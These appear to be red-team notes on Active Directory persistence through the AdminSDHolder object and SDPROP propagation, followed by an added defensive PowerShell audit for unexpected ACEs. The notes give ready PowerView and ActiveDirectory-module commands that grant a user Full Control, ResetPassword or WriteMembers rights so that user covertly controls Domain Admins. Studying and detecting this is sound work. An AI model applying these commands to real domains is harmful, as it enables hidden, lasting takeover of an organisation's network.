AdminSDHolder resides in the System container of a domain and is used to control the permissions, via an ACL, of certain built-in privileged groups (called ProtectedGroups). These are protected and privileged groups with elevated permissions.


This container holds an ACL template. Every hour a process called the Security Descriptor Propagator (SDPROP) compares the ACL of each protected group and its members with the ACL of AdminSDHolder, and any differences are overwritten on the object's ACL.


Once you have gained access as a domain admin, it is not recommended during a Red Teaming activity to add yourself to the Domain Admins group. Instead you can assign yourself Full Control permissions on the Domain Admins group, which is equivalent to being a member of Domain Admins without appearing in its membership, as shown in the figure:


However, since Domain Admins is a protected group, SDPROP will reset its ACL to the default AdminSDHolder template, and it does the same for every protected group.

So the ACLs have to be changed at the AdminSDHolder level to maintain persistence!

Within 60 minutes (when SDPROP next runs), the user will have Full Control in the ACL of groups like Domain Admins without actually being a member of them.

How to

Add Full Control permissions for a user on the AdminSDHolder object, running as Domain Admin (from a Domain Controller).

With PowerView:

Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=<domain>,DC=<domain>,DC=<domain>" -PrincipalIdentity "<user to use for persistence>" -Rights All -PrincipalDomain "<FQDN domain>" -TargetDomain "<FQDN domain>" -Verbose

With ActiveDirectory module:

Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=<domain>,DC=<domain>,DC=<domain>' -Principal '<user to use for persistence>' -Verbose

Other interesting permissions (ResetPassword, WriteMembers) can be granted to a user on the AdminSDHolder in the same way:

Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=<domain>,DC=<domain>,DC=<domain>' -PrincipalIdentity '<user to use for persistence>' -Rights ResetPassword -PrincipalDomain '<FQDN domain>' -TargetDomain '<FQDN domain>' -Verbose
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=<domain>,DC=<domain>,DC=<domain>' -PrincipalIdentity '<user to use for persistence>' -Rights WriteMembers -PrincipalDomain '<FQDN domain>' -TargetDomain '<FQDN domain>' -Verbose

Run SDPROP manually using Invoke-SDPropagator.ps1 to trigger propagation immediately instead of waiting up to an hour.
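From the defender's side, the persistence above shows up as an unexpected ACE on the AdminSDHolder object itself. The following PowerShell audit is an added example, not code from the original notes: it reads the AdminSDHolder DACL through the ActiveDirectory module's AD: drive and flags Allow ACEs granting GenericAll, WriteDacl, WriteOwner, WriteProperty on the member attribute, or the reset-password extended right to principals outside an assumed default baseline. The baseline principal list, the domain naming (NetBIOS-prefixed names, which differ for Enterprise Admins in a child domain) and the read rights of the running account are assumptions to confirm against a known-clean domain.

```powershell
# Added defensive audit, not part of the original notes: flag non-baseline ACEs on AdminSDHolder.
# Assumptions: ActiveDirectory module present, run as a domain user with read access to the
# System container; the baseline principal list below is an assumed default and should be
# confirmed against a known-clean domain before alerts are acted on.
Import-Module ActiveDirectory

$domain        = Get-ADDomain
$adminSdHolder = "CN=AdminSDHolder,CN=System,$($domain.DistinguishedName)"
$acl           = Get-Acl -Path "AD:\$adminSdHolder"

# Principals expected to hold rights on AdminSDHolder by default (assumed baseline).
$nb = $domain.NetBIOSName
$baseline = @(
    'NT AUTHORITY\SYSTEM', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\SELF',
    'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS', 'Everyone',
    'BUILTIN\Administrators', 'BUILTIN\Pre-Windows 2000 Compatible Access',
    'BUILTIN\Windows Authorization Access Group', 'BUILTIN\Terminal Server License Servers',
    "$nb\Domain Admins", "$nb\Enterprise Admins", "$nb\Cert Publishers"
)

# Schema GUIDs: the 'member' attribute and the User-Force-Change-Password extended right.
$memberGuid  = [guid]'bf9679c0-0de6-11d0-a285-00aa003049e2'
$resetPwGuid = [guid]'00299570-246d-11d0-a768-00aa006e0529'
$allGuid     = [guid]::Empty   # empty ObjectType = right applies to the whole object

$R = [System.DirectoryServices.ActiveDirectoryRights]

$findings = foreach ($ace in $acl.Access) {
    if ($ace.AccessControlType -ne 'Allow') { continue }
    $who = $ace.IdentityReference.Value
    if ($baseline -contains $who) { continue }
    $rights     = $ace.ActiveDirectoryRights
    $objectWide = ($ace.ObjectType -eq $allGuid)
    # Rights that let a principal take over protected groups once SDPROP copies this ACL.
    $risky = $rights.HasFlag($R::GenericAll) -or
             $rights.HasFlag($R::WriteDacl)  -or
             $rights.HasFlag($R::WriteOwner) -or
             ($rights.HasFlag($R::WriteProperty)  -and ($objectWide -or $ace.ObjectType -eq $memberGuid)) -or
             ($rights.HasFlag($R::ExtendedRight) -and ($objectWide -or $ace.ObjectType -eq $resetPwGuid))
    [pscustomobject]@{
        Identity   = $who
        Rights     = $rights
        ObjectType = $ace.ObjectType
        Inherited  = $ace.IsInherited
        Risky      = [bool]$risky
    }
}

# Every non-baseline ACE deserves a look; Risky = True ones should raise an alert.
$findings | Sort-Object Risky -Descending | Format-Table -AutoSize
```

Because SDPROP copies this DACL onto every protected group, a single finding here means all of those groups will inherit the same unexpected access within the hour, so the AdminSDHolder object is the one place to baseline and monitor.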